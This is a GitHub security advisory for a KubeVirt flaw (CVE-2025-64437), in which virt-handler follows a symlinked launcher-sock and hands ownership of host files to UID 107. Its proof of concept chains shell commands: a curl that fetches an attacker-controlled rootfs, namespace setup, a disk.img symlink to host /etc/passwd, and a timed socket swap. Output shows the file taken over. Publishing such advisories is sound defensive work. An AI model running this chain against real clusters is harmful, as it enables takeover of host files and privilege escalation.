ghsa-2r4r-5x78-mvqf
Vulnerability from github
Published
2025-11-06 23:36
Modified
2025-11-07 17:35
Severity ?
5.0 (Medium) - CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L
Summary
KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes
Details

Summary

_Short summary of the problem. Make the impact and severity as clear as possible.

It is possible to trick the virt-handler component into changing the ownership of arbitrary files on the host node to the unprivileged user with UID 107 due to mishandling of symlinks when determining the root mount of a virt-launcher pod.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

In the current implementation, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

In this demonstration, two additional vulnerabilities are combined with the primary issue to arbitrarily change the ownership of a file located on the host node:

  1. A symbolic link (launcher-sock) is used to manipulate the interpretation of the root mount within the affected container, effectively bypassing expected isolation boundaries.
  2. Another symbolic link (disk.img) is employed to alter the perceived location of data within a PVC, redirecting it to a file owned by root on the host filesystem.
  3. As a result, the ownership of an existing host file owned by root is changed to a less privileged user with UID 107.

It is assumed that an attacker has access to a virt-launcher pod's file system (for example, obtained using another vulnerability) and also has access to the host file system with the privileges of the qemu user (UID=107). It is also assumed that they can create unprivileged user namespaces:

bash admin@minikube:~$ sysctl -w kernel.unprivileged_userns_clone=1

The below is inspired by an article, where the attacker constructs an isolated environment solely using Linux namespaces and an augmented Alpine container root file system.

```bash

Download an container file system from an attacker-controlled location

qemu-compromised@minikube:~$ curl http://host.minikube.internal:13337/augmented-alpine.tar -o augmented-alpine.tar

Create a directory and extract the file system in it

qemu-compromised@minikube:~$ mkdir rootfs_alpine && tar -xf augmented-alpine.tar -C rootfs_alpine

Create a MOUNT and remapped USER namespace environment and execute a shell process in it

qemu-compromised@minikube:~$ unshare --user --map-root-user --mount sh

Bind-mount the alpine rootfs, move into it and create a directory for the old rootfs.

The user is root in its new USER namesapce

root@minikube:~$ mount --bind rootfs_alpine rootfs_alpine && cd rootfs_alpine && mkdir hostfs_root

Swap the current root of the process and store the old one within a directory

root@minikube:~$ pivot_root . hostfs_root root@minikube:~$ export PATH=/bin:/usr/bin:/usr/sbin

Create the directory with the same path as the PVC mounted within the virt-launcher. In it virt-handler will search for a disk.img file associated with a volume mount

root@minikube:~$ PVC_PATH="/var/run/kubevirt-private/vmi-disks/corrupted-pvc" && \ mkdir -p "${PVC_PATH}" && \ cd "${PVC_PATH}"

Create the disk.img symlink pointing to /etc/passwd of the host in the old root mount directory

root@minikube:~$ ln -sf ../../../../../../../../../../../../hostfs_root/etc/passwd disk.img

Create the socket wich will confuse the isolator detector and start listening on it

root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr - ```

After the environment is set, the launcher-sock in the virt-launcher container should be replaced with a symlink to ../../../../../../../../../proc/2245509/root/tmp/bad.sock (2245509 is the PID of the above isolated shell process). This should be done, however, in a the right moment. For this demonstration, it was decided to trigger the bug while leveraging a race condition when creating or updating a VMI:

```go //pkg/virt-handler/vm.go

func (c VirtualMachineController) vmUpdateHelperDefault(origVMI v1.VirtualMachineInstance, domainExists bool) error { // ... //!!! MK: the change should happen here before executing the below line !!! isolationRes, err := c.podIsolationDetector.Detect(vmi) if err != nil { return fmt.Errorf(failedDetectIsolationFmt, err) } virtLauncherRootMount, err := isolationRes.MountRoot() if err != nil { return err } // ...

    // initialize disks images for empty PVC
    hostDiskCreator := hostdisk.NewHostDiskCreator(c.recorder, lessPVCSpaceToleration, minimumPVCReserveBytes, virtLauncherRootMount)
    // MK: here the permissions are changed
    err = hostDiskCreator.Create(vmi)
    if err != nil {
        return fmt.Errorf("preparing host-disks failed: %v", err)
    }
// ...

```

The manifest of the #acr("vmi") which is going to trigger the bug is:

```yaml

The PVC will be used for the disk.img related bug

apiVersion: v1 kind: PersistentVolumeClaim metadata: name: corrupted-pvc spec: accessModes: - ReadWriteMany resources: requests: storage: 500Mi

apiVersion: kubevirt.io/v1 kind: VirtualMachineInstance metadata: labels: name: launcher-symlink-confusion spec: domain: devices: disks: - name: containerdisk disk: bus: virtio - name: corrupted-pvc disk: bus: virtio - name: cloudinitdisk disk: bus: virtio resources: requests: memory: 1024M terminationGracePeriodSeconds: 0 volumes: - name: containerdisk containerDisk: image: quay.io/kubevirt/cirros-container-disk-demo - name: corrupted-pvc persistentVolumeClaim: claimName: corrupted-pvc - name: cloudinitdisk
cloudInitNoCloud: userDataBase64: SGkuXG4= ```

Just before the line is executed, the attacker should replace the launcher-sock with a symlink to the bad.sock controlled by the isolated process:

```bash

the namespaced process controlled by the attacker has pid=2245509

qemu-compromised@minikube:~$ p=$(pgrep -af "/usr/bin/virt-launcher" | grep -v virt-launcher-monitor | awk '{print $1}') && ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock /proc/$p/root/var/run/kubevirt/sockets/launcher-sock ```

Upon successful exploitation, virt-launcher connects to the attacker controlled socket, misinterprets the root mount and changes the permissions of the host's /etc/passwd file:

```bash

virt-launcher connects successfully

root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr - ... 2025/05/27 17:17:35 socat[2245509] N accepting connection from AF=1 "" on AF=1 "/tmp/bad.sock" 2025/05/27 17:17:35 socat[2245509] N forked off child process 2252010 2025/05/27 17:17:35 socat[2245509] N listening on AF=1 "/tmp/bad.sock" 2025/05/27 17:17:35 socat[2252010] N reading from and writing to stdio 2025/05/27 17:17:35 socat[2252010] N starting data transfer loop with FDs [6,6] and [0,1] PRI * HTTP/2.0 ```

```bash admin@minikube:~$ ls -al /etc/passwd -rw-r--r--. 1 compromised-qemu systemd-resolve 1337 May 23 13:19 /etc/passwd

admin@minikube:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin _rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin docker:x:1000:999:,,,:/home/docker:/bin/bash compromised-qemu:x:107:107::/home/compromised-qemu:/bin/bash ```

The attacker controlling an unprivileged user can now update the contents of the file.

Impact

What kind of vulnerability is it? Who is impacted?

This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/kubevirt/kubevirt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/kubevirt/kubevirt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.6.0-alpha.0"
            },
            {
              "fixed": "1.6.0-beta.0.0.20250801202148-3ce9f41c54d0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-64437"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-06T23:36:39Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n_Short summary of the problem. Make the impact and severity as clear as possible.\n\nIt is possible to trick the `virt-handler` component into changing the ownership of arbitrary files on the host node to the unprivileged user with UID `107` due to mishandling of symlinks when determining the root mount of a `virt-launcher` pod.\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\nIn the current implementation, the `virt-handler` does not verify whether the `launcher-sock` is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID `107` (the same user used by `virt-launcher`) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. \nTo successfully exploit this vulnerability, an attacker should be in control of the file system of the `virt-launcher` pod.\n\n\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\nIn this demonstration, two additional vulnerabilities are combined with the primary issue to arbitrarily change the ownership of a file located on the host node:\n\n1. A symbolic link (`launcher-sock`) is used to manipulate the interpretation of the root mount within the affected container, effectively bypassing expected isolation boundaries.\n2. Another symbolic link (`disk.img`) is employed to [alter the perceived location of data within a PVC](https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qw6q-3pgr-5cwq), redirecting it to a file owned by root on the host filesystem.\n3. As a result, [the ownership of an existing host file owned by root is changed to a less privileged user with UID 107](https://github.com/kubevirt/kubevirt/security/advisories/GHSA-46xp-26xh-hpqh).\n\n\nIt is assumed that an attacker has access to a `virt-launcher` pod\u0027s file system (for example, [obtained using another vulnerability](https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9)) and also has access to the host file system with the privileges of the `qemu` user (`UID=107`). It is also assumed that they can create unprivileged user namespaces:\n\n```bash\nadmin@minikube:~$ sysctl -w kernel.unprivileged_userns_clone=1\n```\n\nThe below is inspired by [an article](https://blog.quarkslab.com/digging-into-linux-namespaces-part-2.html), where the attacker constructs an isolated environment solely using Linux namespaces and an augmented Alpine container root file system.\n\n```bash\n# Download an container file system from an attacker-controlled location\nqemu-compromised@minikube:~$ curl http://host.minikube.internal:13337/augmented-alpine.tar -o augmented-alpine.tar\n# Create a directory and extract the file system in it\nqemu-compromised@minikube:~$  mkdir rootfs_alpine \u0026\u0026 tar -xf augmented-alpine.tar -C rootfs_alpine\n# Create a MOUNT and remapped USER namespace environment and execute a shell process in it\nqemu-compromised@minikube:~$ unshare --user --map-root-user --mount sh\n# Bind-mount the alpine rootfs, move into it and create a directory for the old rootfs.\n# The user is root in its new USER namesapce\nroot@minikube:~$ mount --bind rootfs_alpine rootfs_alpine \u0026\u0026 cd rootfs_alpine \u0026\u0026 mkdir hostfs_root\n# Swap the current root of the process and store the old one within a directory\nroot@minikube:~$ pivot_root . hostfs_root \nroot@minikube:~$ export PATH=/bin:/usr/bin:/usr/sbin\n# Create the directory with the same path as the PVC mounted within the `virt-launcher`. In it `virt-handler` will search for a `disk.img` file associated with a volume mount\nroot@minikube:~$ PVC_PATH=\"/var/run/kubevirt-private/vmi-disks/corrupted-pvc\" \u0026\u0026 \\\nmkdir -p \"${PVC_PATH}\" \u0026\u0026 \\\ncd \"${PVC_PATH}\"\n# Create the `disk.img` symlink pointing to `/etc/passwd` of the host in the old root mount directory\nroot@minikube:~$ ln -sf ../../../../../../../../../../../../hostfs_root/etc/passwd disk.img\n# Create the socket wich will confuse the isolator detector and start listening on it\nroot@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -\n```\n\n\nAfter the environment is set, the `launcher-sock` in the `virt-launcher` container should be replaced with a symlink to `../../../../../../../../../proc/2245509/root/tmp/bad.sock` (2245509 is the PID of the above isolated shell process). This should be done, however, in a the right moment. For this demonstration, it was decided to trigger the bug while leveraging a race condition when creating or updating a VMI:\n\n```go\n//pkg/virt-handler/vm.go\n\nfunc (c *VirtualMachineController) vmUpdateHelperDefault(origVMI *v1.VirtualMachineInstance, domainExists bool) error {\n  // ...\n  //!!! MK: the change should happen here before executing the below line !!!\n  isolationRes, err := c.podIsolationDetector.Detect(vmi)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(failedDetectIsolationFmt, err)\n\t\t}\n\t\tvirtLauncherRootMount, err := isolationRes.MountRoot()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\t// ...\n\n\t\t// initialize disks images for empty PVC\n\t\thostDiskCreator := hostdisk.NewHostDiskCreator(c.recorder, lessPVCSpaceToleration, minimumPVCReserveBytes, virtLauncherRootMount)\n\t\t// MK: here the permissions are changed\n\t\terr = hostDiskCreator.Create(vmi)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"preparing host-disks failed: %v\", err)\n\t\t}\n    // ...\n\n```\n\nThe manifest of the #acr(\"vmi\") which is going to trigger the bug is:\n\n```yaml\n# The PVC will be used for the `disk.img` related bug\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n  name: corrupted-pvc\nspec:\n  accessModes:\n    - ReadWriteMany\n  resources:\n    requests:\n      storage: 500Mi\n---\napiVersion: kubevirt.io/v1\nkind: VirtualMachineInstance\nmetadata:\n  labels:\n  name: launcher-symlink-confusion\nspec:\n  domain:\n    devices:\n      disks:\n      - name: containerdisk\n        disk:\n          bus: virtio\n      - name: corrupted-pvc\n        disk:\n          bus: virtio\n      - name: cloudinitdisk\n        disk:\n          bus: virtio\n    resources:\n      requests:\n        memory: 1024M\n  terminationGracePeriodSeconds: 0\n  volumes:\n  - name: containerdisk\n    containerDisk:\n      image: quay.io/kubevirt/cirros-container-disk-demo\n  - name: corrupted-pvc\n    persistentVolumeClaim:\n      claimName: corrupted-pvc\n  - name: cloudinitdisk      \n    cloudInitNoCloud:\n      userDataBase64: SGkuXG4=\n```\n\nJust before the line is executed, the attacker should replace the `launcher-sock` with a symlink to the `bad.sock` controlled by the isolated process:\n\n```bash\n# the namespaced process controlled by the attacker has pid=2245509\nqemu-compromised@minikube:~$ p=$(pgrep -af \"/usr/bin/virt-launcher\" | grep -v virt-launcher-monitor | awk \u0027{print $1}\u0027) \u0026\u0026  ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock /proc/$p/root/var/run/kubevirt/sockets/launcher-sock\n```\n\n\nUpon successful exploitation, `virt-launcher` connects to the attacker controlled socket, misinterprets the root mount and changes the permissions of the host\u0027s `/etc/passwd` file:\n\n\n```bash\n# `virt-launcher` connects successfully\nroot@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -\n...\n2025/05/27 17:17:35 socat[2245509] N accepting connection from AF=1 \"\u003canon\u003e\" on AF=1 \"/tmp/bad.sock\"\n2025/05/27 17:17:35 socat[2245509] N forked off child process 2252010\n2025/05/27 17:17:35 socat[2245509] N listening on AF=1 \"/tmp/bad.sock\"\n2025/05/27 17:17:35 socat[2252010] N reading from and writing to stdio\n2025/05/27 17:17:35 socat[2252010] N starting data transfer loop with FDs [6,6] and [0,1]\nPRI * HTTP/2.0\n```\n\n```bash\nadmin@minikube:~$ ls -al /etc/passwd\n-rw-r--r--. 1 compromised-qemu systemd-resolve 1337 May 23 13:19 /etc/passwd\n\nadmin@minikube:~$ cat /etc/passwd\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin\nsystemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nstatd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\ndocker:x:1000:999:,,,:/home/docker:/bin/bash\ncompromised-qemu:x:107:107::/home/compromised-qemu:/bin/bash\n```\n\nThe attacker controlling an unprivileged user can now update the contents of the file.\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nThis oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID `107` (the same user used by `virt-launcher`) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.",
  "id": "GHSA-2r4r-5x78-mvqf",
  "modified": "2025-11-07T17:35:55Z",
  "published": "2025-11-06T23:36:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-2r4r-5x78-mvqf"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/commit/3ce9f41c54d04a65f10b23a46771391c00659afb"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/commit/8644dbe0d04784b0bfa8395b91ecbd6001f88f6b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/commit/f59ca63133f25de8fceb3e2a0e5cc0b7bdb6a265"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kubevirt/kubevirt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.